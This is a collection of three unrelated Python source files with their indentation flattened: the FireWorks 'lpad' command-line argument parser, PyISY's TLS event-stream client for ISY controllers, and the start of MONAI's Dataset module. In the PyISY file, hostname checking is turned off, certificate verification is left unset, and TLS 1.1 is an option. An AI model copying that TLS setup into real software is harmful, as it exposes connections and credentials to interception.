check_wf_parser = subparsers.add_parser('check_wflow', help='check a workflow from launchpad')
check_wf_parser.add_argument('-i', '--fw_id', type=int, help='the id of a firework from the workflow')
check_wf_parser.set_defaults(func=check_wf)
get_launchdir_parser = subparsers.add_parser('get_launchdir',
help='get the directory of the most recent launch of the given fw_id.'
' A common usage is "cd `get_launchdir <FW_ID>`" to change the '
'working directory to that of the FW launch')
get_launchdir_parser.add_argument('fw_id', type=int, help='fw_id to chdir to')
get_launchdir_parser.add_argument('--launch_idx', type=int,
help='the index of the launch to get (default of -1 is most recent launch)',
default=-1)
get_launchdir_parser.set_defaults(func=get_launchdir)
append_wf_parser = subparsers.add_parser('append_wflow',
help='append a workflow from file to a workflow on launchpad')
append_wf_parser.add_argument(*fw_id_args, type=fw_id_kwargs["type"], help='parent firework ids')
append_wf_parser.add_argument('-f', '--wf_file', help='path to a firework or workflow file')
append_wf_parser.add_argument('-d', '--detour', help='append workflow as a detour', dest='detour',
action='store_true')
append_wf_parser.add_argument('--no_pull_spec_mods', help='do not to pull spec mods from parent',
dest='pull_spec_mods', action='store_false')
append_wf_parser.set_defaults(func=append_wf, detour=False, pull_spec_mods=True)
dump_wf_parser = subparsers.add_parser('dump_wflow', help='dump a workflow from launchpad to a file')
dump_wf_parser.add_argument('-i', '--fw_id', type=int, help='the id of a firework from the workflow')
dump_wf_parser.add_argument('-f', '--wf_file', help='path to a local file to store the workflow')
dump_wf_parser.set_defaults(func=dump_wf)
addscript_parser = subparsers.add_parser('add_scripts', help='quickly add a script '
'(or several scripts) to run in sequence')
addscript_parser.add_argument('scripts', help="Script to run, or space-separated names", nargs='*')
addscript_parser.add_argument('-n', '--names', help='Firework name, or space-separated names', nargs='*')
addscript_parser.add_argument('-w', '--wf_name', help='Workflow name')
addscript_parser.add_argument('-d', '--delimiter', help='delimiter for separating scripts', default=',')
addscript_parser.set_defaults(func=add_scripts)
get_fw_parser = subparsers.add_parser(
'get_fws', help='get information about FireWorks')
get_fw_parser.add_argument(*fw_id_args, **fw_id_kwargs)
get_fw_parser.add_argument('-n', '--name', help='get FWs with this name')
get_fw_parser.add_argument(*state_args, **state_kwargs)
get_fw_parser.add_argument(*query_args, **query_kwargs)
get_fw_parser.add_argument(*launches_mode_args, **launches_mode_kwargs)
get_fw_parser.add_argument(*qid_args, **qid_kwargs)
get_fw_parser.add_argument(*disp_args, **disp_kwargs)
get_fw_parser.add_argument('-m', '--max', help='limit results', default=0,
type=int)
get_fw_parser.add_argument('--sort', help='Sort results',
choices=["created_on", "updated_on"])
get_fw_parser.add_argument('--rsort', help='Reverse sort results',
choices=["created_on", "updated_on"])
get_fw_parser.set_defaults(func=get_fws)
get_fw_in_wf_parser = subparsers.add_parser(
'get_fws_in_wflows', help='get information about FireWorks in Workflows')
get_fw_in_wf_parser.add_argument(*wf_prefixed_fw_id_args, **fw_id_kwargs)
get_fw_in_wf_parser.add_argument('-wfn', '--wf_name', help='get WFs with this name')
get_fw_in_wf_parser.add_argument(*wf_prefixed_state_args, **state_kwargs)
get_fw_in_wf_parser.add_argument(*wf_prefixed_query_args, **query_kwargs)
get_fw_in_wf_parser.add_argument(*fw_prefixed_fw_id_args, **fw_id_kwargs)
get_fw_in_wf_parser.add_argument('-fwn', '--fw_name', help='get FWs with this name')
get_fw_in_wf_parser.add_argument(*fw_prefixed_state_args, **state_kwargs)
get_fw_in_wf_parser.add_argument(*fw_prefixed_query_args, **query_kwargs)
get_fw_in_wf_parser.add_argument(*launches_mode_args, **launches_mode_kwargs)
get_fw_in_wf_parser.add_argument(*qid_args, **qid_kwargs)
get_fw_in_wf_parser.add_argument(*disp_args, **disp_kwargs)
get_fw_in_wf_parser.add_argument('-m', '--max', help='limit results', default=0,
type=int)
get_fw_in_wf_parser.add_argument('--sort', help='Sort results',
choices=["created_on", "updated_on"])
get_fw_in_wf_parser.add_argument('--rsort', help='Reverse sort results',
choices=["created_on", "updated_on"])
get_fw_in_wf_parser.set_defaults(func=get_fws_in_wfs)
trackfw_parser = subparsers.add_parser('track_fws', help='Track FireWorks')
trackfw_parser.add_argument(*fw_id_args, **fw_id_kwargs)
trackfw_parser.add_argument('-n', '--name', help='name')
trackfw_parser.add_argument(*state_args, **state_kwargs)
trackfw_parser.add_argument(*query_args, **query_kwargs)
trackfw_parser.add_argument(*launches_mode_args, **launches_mode_kwargs)
trackfw_parser.add_argument('-c', '--include', nargs="+",
help='only include these files in the report')
trackfw_parser.add_argument('-x', '--exclude', nargs="+",
help='exclude these files from the report')
trackfw_parser.add_argument('-m', '--max', help='limit results', default=0, type=int)
trackfw_parser.set_defaults(func=track_fws)
rerun_fws_parser = subparsers.add_parser('rerun_fws', help='re-run Firework(s)')
rerun_fws_parser.add_argument(*fw_id_args, **fw_id_kwargs)
rerun_fws_parser.add_argument('-n', '--name', help='name')
rerun_fws_parser.add_argument(*state_args, **state_kwargs)
rerun_fws_parser.add_argument(*query_args, **query_kwargs)
rerun_fws_parser.add_argument(*launches_mode_args, **launches_mode_kwargs)
rerun_fws_parser.add_argument('--password', help="Today's date, e.g. 2012-02-25. "
"Password or positive response to input prompt "
"required when modifying more than {} "
"entries.".format(PW_CHECK_NUM))
rerun_fws_parser.add_argument('--task-level', action='store_true', help='Enable task level recovery')
rerun_fws_parser.add_argument('-lid', '--launch_id', nargs='+',
help='Recover launch id. --task-level must be given', default=None, type=int)
recover_mode_group = rerun_fws_parser.add_mutually_exclusive_group()
recover_mode_group.add_argument('-cp', '--copy-data', action='store_const', const='cp',
dest='recover_mode',
help='Copy data from previous run. --task-level must be given')
recover_mode_group.add_argument('-pd', '--previous-dir', action='store_const', const='prev_dir',
dest='recover_mode',
help='Reruns in the previous folder. --task-level must be given')
rerun_fws_parser.set_defaults(func=rerun_fws)
defuse_fw_parser = subparsers.add_parser('defuse_fws', help='cancel (de-fuse) a single Firework')
defuse_fw_parser.add_argument(*fw_id_args, **fw_id_kwargs)
defuse_fw_parser.add_argument('-n', '--name', help='name')
defuse_fw_parser.add_argument(*state_args, **state_kwargs)
defuse_fw_parser.add_argument(*query_args, **query_kwargs)
defuse_fw_parser.add_argument(*launches_mode_args, **launches_mode_kwargs)
defuse_fw_parser.add_argument('--password', help="Today's date, e.g. 2012-02-25. "
"Password or positive response to input prompt "
"required when modifying more than {} "
"entries.".format(PW_CHECK_NUM))
defuse_fw_parser.set_defaults(func=defuse_fws)
pause_fw_parser = subparsers.add_parser('pause_fws', help='pause a single Firework')
pause_fw_parser.add_argument(*fw_id_args, **fw_id_kwargs)
pause_fw_parser.add_argument('-n', '--name', help='name')
pause_fw_parser.add_argument(*state_args, **state_kwargs)
pause_fw_parser.add_argument(*query_args, **query_kwargs)
pause_fw_parser.add_argument(*launches_mode_args, **launches_mode_kwargs)
pause_fw_parser.add_argument('--password', help="Today's date, e.g. 2012-02-25. "
"Password or positive response to input "
"prompt required when modifying more than {} "
"entries.".format(PW_CHECK_NUM))
pause_fw_parser.set_defaults(func=pause_fws)
reignite_fw_parser = subparsers.add_parser('reignite_fws', help='reignite (un-cancel) a set of Fireworks')
reignite_fw_parser.add_argument(*fw_id_args, **fw_id_kwargs)
reignite_fw_parser.add_argument('-n', '--name', help='name')
reignite_fw_parser.add_argument(*state_args, **state_kwargs)
reignite_fw_parser.add_argument(*query_args, **query_kwargs)
reignite_fw_parser.add_argument(*launches_mode_args, **launches_mode_kwargs)
reignite_fw_parser.add_argument('--password', help="Today's date, e.g. 2012-02-25. "
"Password or positive response to input "
"prompt required when modifying more than {} "
"entries.".format(PW_CHECK_NUM))
reignite_fw_parser.set_defaults(func=reignite_fws)
resume_fw_parser = subparsers.add_parser('resume_fws', help='resume (un-pause) a set of Fireworks')
resume_fw_parser.add_argument(*fw_id_args, **fw_id_kwargs)
resume_fw_parser.add_argument('-n', '--name', help='name')
resume_fw_parser.add_argument(*state_args, **state_kwargs)
resume_fw_parser.add_argument(*query_args, **query_kwargs)
resume_fw_parser.add_argument(*launches_mode_args, **launches_mode_kwargs)
resume_fw_parser.add_argument('--password', help="Today's date, e.g. 2012-02-25. "
"Password or positive response to input "
"prompt required when modifying more than {} "
"entries.".format(PW_CHECK_NUM))
resume_fw_parser.set_defaults(func=resume_fws)
update_fws_parser = subparsers.add_parser(
'update_fws', help='Update a Firework spec.')
update_fws_parser.add_argument(*fw_id_args, **fw_id_kwargs)
update_fws_parser.add_argument('-n', '--name', help='get FWs with this name')
update_fws_parser.add_argument(*state_args, **state_kwargs)
update_fws_parser.add_argument(*query_args, **query_kwargs)
update_fws_parser.add_argument(*launches_mode_args, **launches_mode_kwargs)
update_fws_parser.add_argument("-u", "--update", type=str,
help='Doc update (enclose pymongo-style dict '
'in single-quotes, e.g. \'{'
'"_tasks.1.hello": "world"}\')')
update_fws_parser.add_argument("--mongo", default=False, action='store_true',
help="Use full pymongo style dict to modify spec. "
"Be very careful as you can break your spec")
update_fws_parser.add_argument('--password', help="Today's date, e.g. 2012-02-25. "
"Password or positive response to input "
"prompt required when modifying more than {} "
"entries.".format(PW_CHECK_NUM))
update_fws_parser.set_defaults(func=update_fws)
get_wf_parser = subparsers.add_parser(
'get_wflows', help='get information about Workflows')
get_wf_parser.add_argument(*fw_id_args, **fw_id_kwargs)
get_wf_parser.add_argument('-n', '--name', help='get WFs with this name')
get_wf_parser.add_argument(*state_args, **state_kwargs)
get_wf_parser.add_argument(*query_args, **query_kwargs)
get_wf_parser.add_argument(*disp_args, **disp_kwargs)
get_wf_parser.add_argument('-m', '--max', help='limit results', default=0, type=int)
get_wf_parser.add_argument('--sort', help='Sort results',
choices=["created_on", "updated_on"])
get_wf_parser.add_argument('--rsort', help='Reverse sort results',
choices=["created_on", "updated_on"])
get_wf_parser.add_argument('-t', '--table',
help='Print results in table form instead of '
'json. Needs prettytable. Works best '
'with "-d less"',
action="store_true")
get_wf_parser.set_defaults(func=get_wfs)
defuse_wf_parser = subparsers.add_parser('defuse_wflows', help='cancel (de-fuse) an entire Workflow')
defuse_wf_parser.add_argument('--defuse_all_states', help='also defuse COMPLETED and FIZZLED workflows',
action='store_true')
defuse_wf_parser.add_argument(*fw_id_args, **fw_id_kwargs)
defuse_wf_parser.add_argument('-n', '--name', help='name')
defuse_wf_parser.add_argument(*state_args, **state_kwargs)
defuse_wf_parser.add_argument(*query_args, **query_kwargs)
defuse_wf_parser.add_argument('--password', help="Today's date, e.g. 2012-02-25. "
"Password or positive response to input prompt "
"required when modifying more than {} entries.".
format(PW_CHECK_NUM))
defuse_wf_parser.set_defaults(func=defuse_wfs)
pause_wf_parser = subparsers.add_parser('pause_wflows', help='pause an entire Workflow')
pause_wf_parser.add_argument(*fw_id_args, **fw_id_kwargs)
pause_wf_parser.add_argument('-n', '--name', help='name')
pause_wf_parser.add_argument(*state_args, **state_kwargs)
pause_wf_parser.add_argument(*query_args, **query_kwargs)
pause_wf_parser.add_argument('--password', help="Today's date, e.g. 2012-02-25. "
"Password or positive response to input prompt "
"required when modifying more than {} entries.".
format(PW_CHECK_NUM))
pause_wf_parser.set_defaults(func=pause_wfs)
reignite_wfs_parser = subparsers.add_parser('reignite_wflows',
help='reignite (un-cancel) an entire Workflow')
reignite_wfs_parser.add_argument(*fw_id_args, **fw_id_kwargs)
reignite_wfs_parser.add_argument('-n', '--name', help='name')
reignite_wfs_parser.add_argument(*state_args, **state_kwargs)
reignite_wfs_parser.add_argument(*query_args, **query_kwargs)
reignite_wfs_parser.add_argument('--password', help="Today's date, e.g. 2012-02-25. "
"Password or positive response to input "
"prompt required when modifying more than {} "
"entries.".format(PW_CHECK_NUM))
reignite_wfs_parser.set_defaults(func=reignite_wfs)
archive_parser = subparsers.add_parser('archive_wflows', help='archive an entire Workflow (irreversible)')
archive_parser.add_argument(*fw_id_args, **fw_id_kwargs)
archive_parser.add_argument('-n', '--name', help='name')
archive_parser.add_argument(*state_args, **state_kwargs)
archive_parser.add_argument(*query_args, **query_kwargs)
archive_parser.add_argument('--password', help="Today's date, e.g. 2012-02-25. "
"Password or positive response to input prompt "
"required when modifying more than {} "
"entries.".format(PW_CHECK_NUM))
archive_parser.set_defaults(func=archive)
delete_wfs_parser = subparsers.add_parser(
'delete_wflows', help='Delete workflows (permanently). Use "archive_wflows" instead if '
'you want to "soft-remove"')
delete_wfs_parser.add_argument(*fw_id_args, **fw_id_kwargs)
delete_wfs_parser.add_argument('-n', '--name', help='name')
delete_wfs_parser.add_argument(*state_args, **state_kwargs)
delete_wfs_parser.add_argument(*query_args, **query_kwargs)
delete_wfs_parser.add_argument('--password', help="Today's date, e.g. 2012-02-25. "
"Password or positive response to input prompt "
"required when modifying more than {} "
"entries.".format(PW_CHECK_NUM))
delete_wfs_parser.add_argument('--ldirs', help="the launch directories associated with the WF will "
"be deleted as well, if possible", dest="delete_launch_dirs",
action='store_true')
delete_wfs_parser.set_defaults(func=delete_wfs, delete_launch_dirs=False)
get_qid_parser = subparsers.add_parser('get_qids', help='get the queue id of a Firework')
get_qid_parser.add_argument(*fw_id_args, **fw_id_kwargs)
get_qid_parser.set_defaults(func=get_qid)
cancel_qid_parser = subparsers.add_parser('cancel_qid', help='cancel a reservation')
cancel_qid_parser.add_argument(*qid_args, **qid_kwargs)
cancel_qid_parser.set_defaults(func=cancel_qid)
reservation_parser = subparsers.add_parser('detect_unreserved', help='Find launches with stale reservations')
reservation_parser.add_argument('--time', help='expiration time (seconds)',
default=RESERVATION_EXPIRATION_SECS, type=int)
reservation_parser.add_argument('--rerun', help='cancel and rerun expired reservations', action='store_true')
reservation_parser.add_argument(*enh_disp_args, **enh_disp_kwargs)
reservation_parser.set_defaults(func=detect_unreserved)
fizzled_parser = subparsers.add_parser('detect_lostruns',
help='Find launches that have FIZZLED')
fizzled_parser.add_argument('--time', help='expiration time (seconds)',
default=RUN_EXPIRATION_SECS,
type=int)
fizzled_parser.add_argument('--fizzle', help='mark lost runs as fizzled', action='store_true')
fizzled_parser.add_argument('--rerun', help='rerun lost runs', action='store_true')
fizzled_parser.add_argument('--refresh', help='refresh the detected inconsistent fireworks',
action='store_true')
fizzled_parser.add_argument('--max_runtime', help='max runtime, matching failures ran no longer '
'than this (seconds)', type=int)
fizzled_parser.add_argument('--min_runtime', help='min runtime, matching failures must have run '
'at least this long (seconds)', type=int)
fizzled_parser.add_argument('-q', '--query',
help='restrict search to only FWs matching this query')
fizzled_parser.add_argument('-lq', '--launch_query',
help='restrict search to only launches matching this query')
fizzled_parser.add_argument(*enh_disp_args, **enh_disp_kwargs)
fizzled_parser.set_defaults(func=detect_lostruns)
priority_parser = subparsers.add_parser('set_priority', help='modify the priority of one or more FireWorks')
    priority_parser.add_argument('priority', help='the priority to set for the matching FireWorks', default=None, type=int)
priority_parser.add_argument(*fw_id_args, **fw_id_kwargs)
priority_parser.add_argument('-n', '--name', help='name')
priority_parser.add_argument(*state_args, **state_kwargs)
priority_parser.add_argument(*query_args, **query_kwargs)
priority_parser.add_argument(*launches_mode_args, **launches_mode_kwargs)
priority_parser.add_argument('--password', help="Today's date, e.g. 2012-02-25. "
"Password or positive response to input prompt "
"required when modifying more than {} "
"entries.".format(PW_CHECK_NUM))
priority_parser.add_argument('-wf', action='store_true',
help='the priority will be set for all the fireworks of the matching workflows')
priority_parser.set_defaults(func=set_priority)
parser.add_argument('-l', '--launchpad_file', help='path to LaunchPad file containing '
'central DB connection info',
default=None)
parser.add_argument('-c', '--config_dir',
help='path to a directory containing the LaunchPad file (used if -l unspecified)',
default=CONFIG_FILE_DIR)
parser.add_argument('--logdir', help='path to a directory for logging')
parser.add_argument('--loglvl', help='level to print log messages', default='INFO')
parser.add_argument('-s', '--silencer', help='shortcut to mute log messages', action='store_true')
webgui_parser = subparsers.add_parser('webgui', help='launch the web GUI')
webgui_parser.add_argument("--port", dest="port", type=int, default=WEBSERVER_PORT,
help="Port to run the web server on (default: 5000 or WEBSERVER_PORT arg in "
"FW_config.yaml)")
webgui_parser.add_argument("--host", dest="host", type=str, default=WEBSERVER_HOST,
help="Host to run the web server on (default: 127.0.0.1 or WEBSERVER_HOST arg in "
"FW_config.yaml)")
webgui_parser.add_argument('--debug', help='print debug messages', action='store_true')
webgui_parser.add_argument('-s', '--server_mode', help='run in server mode (skip opening the browser)',
action='store_true')
webgui_parser.add_argument('--nworkers', type=arg_positive_int, help='Number of worker processes for server mode')
webgui_parser.add_argument('--fwquery', help='additional query filter for FireWorks as JSON string')
webgui_parser.add_argument('--wflowquery', help='additional query filter for Workflows as JSON string')
webgui_parser.add_argument('--webgui_username',
help='Optional username needed to access webgui', type=str, default=None)
webgui_parser.add_argument('--webgui_password',
help='Optional password needed to access webgui', type=str, default=None)
webgui_parser.set_defaults(func=webgui)
recover_parser = subparsers.add_parser('recover_offline', help='recover offline workflows')
recover_parser.add_argument('-i', '--ignore_errors', help='ignore errors', action='store_true')
recover_parser.add_argument('-w', '--fworker_file', help='path to fworker file. An empty string '
'will match all the workers', default=FWORKER_LOC)
recover_parser.add_argument('-pe', '--print-errors', help='print errors', action='store_true')
recover_parser.set_defaults(func=recover_offline)
forget_parser = subparsers.add_parser('forget_offline', help='forget offline workflows')
forget_parser.add_argument('-n', '--name', help='name')
forget_parser.add_argument(*state_args, **state_kwargs)
forget_parser.add_argument(*query_args, **query_kwargs)
forget_parser.set_defaults(func=forget_offline)
# admin commands
admin_parser = subparsers.add_parser('admin', help='Various db admin commands, '
'type "lpad admin -h" for more.',
parents=[parent_parser])
admin_subparser = admin_parser.add_subparsers(title="action",
dest="action_command")
maintain_parser = admin_subparser.add_parser('maintain', help='Run database maintenance')
maintain_parser.add_argument('--infinite', help='loop infinitely', action='store_true')
maintain_parser.add_argument('--maintain_interval', help='sleep time between maintenance loops (infinite mode)',
default=MAINTAIN_INTERVAL, type=int)
maintain_parser.set_defaults(func=maintain)
orphaned_parser = admin_subparser.add_parser('orphaned', help='Find orphaned FireWorks')
orphaned_parser.add_argument(*fw_id_args, **fw_id_kwargs)
orphaned_parser.add_argument('-n', '--name', help='get FWs with this name')
orphaned_parser.add_argument(*state_args, **state_kwargs)
orphaned_parser.add_argument(*query_args, **query_kwargs)
orphaned_parser.add_argument(*launches_mode_args, **launches_mode_kwargs)
orphaned_parser.add_argument(*qid_args, **qid_kwargs)
orphaned_parser.add_argument(*disp_args, **disp_kwargs)
orphaned_parser.add_argument('-m', '--max', help='limit results', default=0,
type=int)
orphaned_parser.add_argument('--sort', help='Sort results',
choices=["created_on", "updated_on"])
orphaned_parser.add_argument('--rsort', help='Reverse sort results',
choices=["created_on", "updated_on"])
orphaned_parser.add_argument('--remove', help='delete orphaned',
action='store_true')
orphaned_parser.add_argument('--ldirs', help="the launch directories "
"associated with the orphaned Fireworks will "
"be deleted as well, if possible",
dest="delete_launch_dirs",
action='store_true')
orphaned_parser.set_defaults(func=orphaned)
tuneup_parser = admin_subparser.add_parser('tuneup',
help='Tune-up the database (should be performed during '
'scheduled downtime)')
tuneup_parser.add_argument('--full', help='Run full tuneup and compaction (should be run during '
'DB downtime only)', action='store_true')
tuneup_parser.set_defaults(func=tuneup)
refresh_parser = admin_subparser.add_parser('refresh', help='manually force a workflow refresh '
'(not usually needed)')
refresh_parser.add_argument(*fw_id_args, **fw_id_kwargs)
refresh_parser.add_argument('-n', '--name', help='name')
refresh_parser.add_argument(*state_args, **state_kwargs)
refresh_parser.add_argument(*query_args, **query_kwargs)
refresh_parser.add_argument('--password', help="Today's date, e.g. 2012-02-25. "
"Password or positive response to input prompt "
"required when modifying more than {} "
"entries.".format(PW_CHECK_NUM))
refresh_parser.set_defaults(func=refresh)
unlock_parser = admin_subparser.add_parser('unlock', help='manually unlock a workflow that is '
'locked (only if you know what you are doing!)')
unlock_parser.add_argument(*fw_id_args, **fw_id_kwargs)
unlock_parser.add_argument('-n', '--name', help='name')
unlock_parser.add_argument(*state_args, **state_kwargs)
unlock_parser.add_argument(*query_args, **query_kwargs)
unlock_parser.add_argument('--password', help="Today's date, e.g. 2012-02-25. "
"Password or positive response to input prompt "
"required when modifying more than {} entries.".format(PW_CHECK_NUM))
unlock_parser.set_defaults(func=unlock)
report_parser = subparsers.add_parser('report', help='Compile a report of runtime stats, '
'type "lpad report -h" for more options.')
report_parser.add_argument("-c", "--collection", help="The collection to report on; "
"choose from 'fws' (default), "
"'wflows', or 'launches'.", default="fws")
report_parser.add_argument('-i', '--interval', help="Interval on which to split the report. "
"Choose from 'minutes', 'hours', "
"'days' (default), 'months', or 'years'.", default="days")
report_parser.add_argument("-n", "--num_intervals", help="The number of intervals on which to "
"report (default=5)", type=int, default=5)
report_parser.add_argument('-q', '--query', help="Additional Pymongo queries to filter entries "
"before processing.")
report_parser.set_defaults(func=report)
introspect_parser = subparsers.add_parser('introspect', help='Introspect recent runs to pin down errors')
introspect_parser.add_argument('-m', '--max', help='examine past <max> results', default=100, type=int)
introspect_parser.add_argument('-t', '--threshold',
help='controls signal to noise ratio, e.g., 10 means '
'difference of at least 10 runs between fizzled/completed count',
default=10, type=int)
introspect_parser.set_defaults(func=introspect)
try:
import argcomplete
argcomplete.autocomplete(parser)
# This supports bash autocompletion. To enable this, pip install
# argcomplete, activate global completion, or add
# eval "$(register-python-argcomplete lpad)"
# into your .bash_profile or .bashrc
except ImportError:
pass
args = parser.parse_args()
args.output = get_output_func(args.output)
if args.command is None:
# if no command supplied, print help
parser.print_help()
else:
for opt in fw_id_options:
if hasattr(args, opt) and getattr(args, opt) is not None and \
isinstance(getattr(args, opt), six.string_types):
if "," in getattr(args, opt):
setattr(args, opt, [int(x) for x in getattr(args, opt).split(",")])
else:
setattr(args, opt, [int(getattr(args, opt))])
args.func(args)
if __name__ == '__main__':
lpad()
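# A minimal sketch (not part of FireWorks) of the argparse dispatch pattern used above:
# each subparser registers its handler via set_defaults(func=...), and after parsing the
# selected handler is called with the parsed namespace, mirroring args.func(args) above.
# The names below are illustrative placeholders.
#
#     import argparse
#
#     def say_hello(args):
#         print("hello", args.name)
#
#     demo_parser = argparse.ArgumentParser()
#     demo_sub = demo_parser.add_subparsers(dest="command")
#     hello_parser = demo_sub.add_parser("hello")
#     hello_parser.add_argument("-n", "--name", default="world")
#     hello_parser.set_defaults(func=say_hello)
#
#     demo_args = demo_parser.parse_args(["hello", "-n", "fireworks"])
#     demo_args.func(demo_args)  # dispatches to say_hello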
|
eventsSSL.py
|
import base64
import datetime
import socket
import select
import ssl
import sys
from threading import Thread
import xml
from xml.dom import minidom
from PyISY.Events import strings
POLL_TIME = 5
class SSLEventStream(object):
def __init__(self, parent, lost_fun=None):
#super(EventStream, self).__init__(socket.AF_INET, socket.SOCK_STREAM)
self.parent = parent
self._running = False
self._reader = None
self._writer = None
self._thread = None
self._subscribed = False
self._connected = False
self._lasthb = None
self._hbwait = 0
self._lostfun = lost_fun
        # pull necessary connection data
auth_data = {'user': self.parent.conn._username,
'passwd': self.parent.conn._password}
self.data = {}
authstr = '{user}:{passwd}'.format(**auth_data)
try:
self.data['auth'] = base64.encodestring(authstr).strip()
except TypeError:
authstr = bytes(authstr, 'ascii')
self.data['auth'] = base64.encodebytes(authstr) \
.strip().decode('ascii')
self.data['addr'] = self.parent.conn._address
self.data['port'] = int(self.parent.conn._port)
self.data['passwd'] = self.parent.conn._password
self.data['tls'] = self.parent.conn._tls_ver
# create TLS encrypted socket
if self.data['tls'] == 1.1:
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1_1)
else:
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1_2)
#context.verify_mode = ssl.CERT_OPTIONAL
context.check_hostname = False
self.socket = context.wrap_socket \
(socket.socket(socket.AF_INET, socket.SOCK_STREAM),
server_hostname='https://{}'.format(self.data['addr']))
def _NIYerror(self):
raise NotImplementedError('Function not available while '
+ 'socket is closed.')
def _mkmsg(self, msg):
head = msg['head']
body = msg['body']
body = body.format(**self.data)
length = len(body)
head = head.format(length=length, **self.data)
return head + body
def _routemsg(self, msg):
# check xml formatting
try:
xmldoc = minidom.parseString(msg)
except xml.parsers.expat.ExpatError:
self.parent.log.warning('ISY Received Malformed XML:\n' + msg)
return
self.parent.log.debug('ISY Update Received:\n' + msg)
# direct the event message
try:
cntrl = xmldoc.getElementsByTagName('control')[0].firstChild.toxml()
except IndexError:
# No control tag
pass
else:
if cntrl == '_0': # ISY HEARTBEAT
self._lasthb = datetime.datetime.now()
self._hbwait = int(xmldoc.getElementsByTagName('action')[0].
firstChild.toxml())
self.parent.log.debug('ISY HEARTBEAT: ' + self._lasthb.isoformat())
if cntrl == 'ST': # NODE UPDATE
self.parent.nodes._upmsg(xmldoc)
            elif cntrl[0] != '_':  # NODE CONTROL EVENT
self.parent.nodes._controlmsg(xmldoc)
elif cntrl == '_11': # WEATHER UPDATE
if self.parent.configuration['Weather Information']:
self.parent.climate._upmsg(xmldoc)
elif cntrl == '_1': # VARIABLE OR PROGRAM UPDATE
if '<var' in msg: # VARIABLE
self.parent.variables._upmsg(xmldoc)
elif '<id>' in msg: # PROGRAM
self.parent.programs._upmsg(xmldoc)
else: # SOMETHING HAPPENED WITH A PROGRAM FOLDER
                    # but the ISY didn't tell us what, so...
self.parent.programs.update()
# A wild stream id appears!
if 'sid=' in msg and 'sid' not in self.data:
self._upmsg(xmldoc)
def _upmsg(self, xmldoc):
features = xmldoc.getElementsByTagName('Event')
self.data['sid'] = features[0].attributes['sid'].value
self.parent.log.debug('ISY Updated Events Stream ID')
@property
def running(self):
try:
            return self._thread.is_alive()
        except AttributeError:
            return False
@running.setter
def running(self, val):
if val and not self.running:
self.parent.log.info('ISY Starting Updates')
if self.connect():
self.subscribe()
self._running = True
self._thread = Thread(target=self.watch)
self._thread.daemon = True
self._thread.start()
else:
self.parent.log.info('ISY Stopping Updates')
self._running = False
self.unsubscribe()
self.disconnect()
def read(self):
if self._reader is None:
self._NIYerror()
else:
loop = True
output = ''
while loop:
try:
new_data = self.socket.recv(4096)
except ssl.SSLWantReadError:
pass
except socket.error:
loop = False
else:
if sys.version_info.major == 3:
new_data = new_data.decode('utf-8')
output += new_data
if len(new_data) * 8 < 4096:
loop = False
return output.split('\n')
def write(self, msg):
if self._writer is None:
self._NIYerror()
else:
self._writer.write(msg)
self._writer.flush()
def connect(self):
if not self._connected:
try:
self.socket.connect((self.data['addr'], self.data['port']))
self.cert = self.socket.getpeercert()
except OSError:
self.parent.log.error('PyISY could not connect to ISY ' +
'event stream.')
if self._lostfun is not None:
self._lostfun()
return False
self.socket.setblocking(0)
self._reader = self.socket.makefile("r")
self._writer = self.socket.makefile("w")
self._connected = True
return True
else:
return True
def disconnect(self):
if self._connected:
self.socket.close()
self._connected = False
self._subscribed = False
self._running = False
def subscribe(self):
if not self._subscribed and self._connected:
if 'sid' not in self.data:
msg = self._mkmsg(strings.sub_msg)
self.write(msg)
else:
msg = self._mkmsg(strings.resub_msg)
self.write(msg)
self._subscribed = True
def unsubscribe(self):
if self._subscribed and self._connected:
msg = self._mkmsg(strings.unsub_msg)
self.write(msg)
self._subscribed = False
self.disconnect()
@property
def heartbeat_time(self):
if self._lasthb is not None:
return (datetime.datetime.now() - self._lasthb).seconds
else:
return 0.
def watch(self):
if self._subscribed:
while self._running and self._subscribed:
# verify connection is still alive
if self.heartbeat_time > self._hbwait:
self.disconnect()
self.parent.log.warning('PyISY lost connection to '
+ 'the ISY event stream.')
if self._lostfun is not None:
self._lostfun()
# poll socket for new data
inready, _, _ = \
select.select([self.socket], [], [], POLL_TIME)
if self.socket in inready:
for data in self.read():
if data.startswith('<?xml'):
data = data.strip().replace('POST reuse HTTP/1.1', '')
self._routemsg(data)
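# A minimal sketch (not part of PyISY) of the TLS client-socket pattern used in
# SSLEventStream.__init__ above: wrap a plain TCP socket in an SSLContext, then connect
# and read the peer certificate. The host and port below are illustrative placeholders.
#
#     import socket
#     import ssl
#
#     context = ssl.SSLContext(ssl.PROTOCOL_TLSv1_2)
#     context.check_hostname = False  # hostname checking is relaxed, mirroring the code above
#     tls_sock = context.wrap_socket(
#         socket.socket(socket.AF_INET, socket.SOCK_STREAM),
#         server_hostname="192.168.1.10")
#     tls_sock.connect(("192.168.1.10", 443))
#     print(tls_sock.getpeercert())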
|
dataset.py
|
# Copyright 2020 - 2021 MONAI Consortium
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import collections.abc
import math
import pickle
import shutil
import sys
import tempfile
import threading
import time
import warnings
from copy import copy, deepcopy
from multiprocessing.pool import ThreadPool
from pathlib import Path
from typing import IO, TYPE_CHECKING, Any, Callable, Dict, List, Optional, Sequence, Union
import numpy as np
import torch
from torch.utils.data import Dataset as _TorchDataset
from torch.utils.data import Subset
from monai.data.utils import convert_tables_to_dicts, pickle_hashing
from monai.transforms import Compose, Randomizable, ThreadUnsafe, Transform, apply_transform
from monai.utils import MAX_SEED, ensure_tuple, get_seed, min_version, optional_import
from monai.utils.misc import first
if TYPE_CHECKING:
from tqdm import tqdm
has_tqdm = True
else:
tqdm, has_tqdm = optional_import("tqdm", "4.47.0", min_version, "tqdm")
lmdb, _ = optional_import("lmdb")
pd, _ = optional_import("pandas")
class Dataset(_TorchDataset):
"""
A generic dataset with a length property and an optional callable data transform
when fetching a data sample.
If passing slicing indices, will return a PyTorch Subset, for example: `data: Subset = dataset[1:4]`,
for more details, please check: https://pytorch.org/docs/stable/data.html#torch.utils.data.Subset
For example, typical input data can be a list of dictionaries::
[{ { {
'img': 'image1.nii.gz', 'img': 'image2.nii.gz', 'img': 'image3.nii.gz',
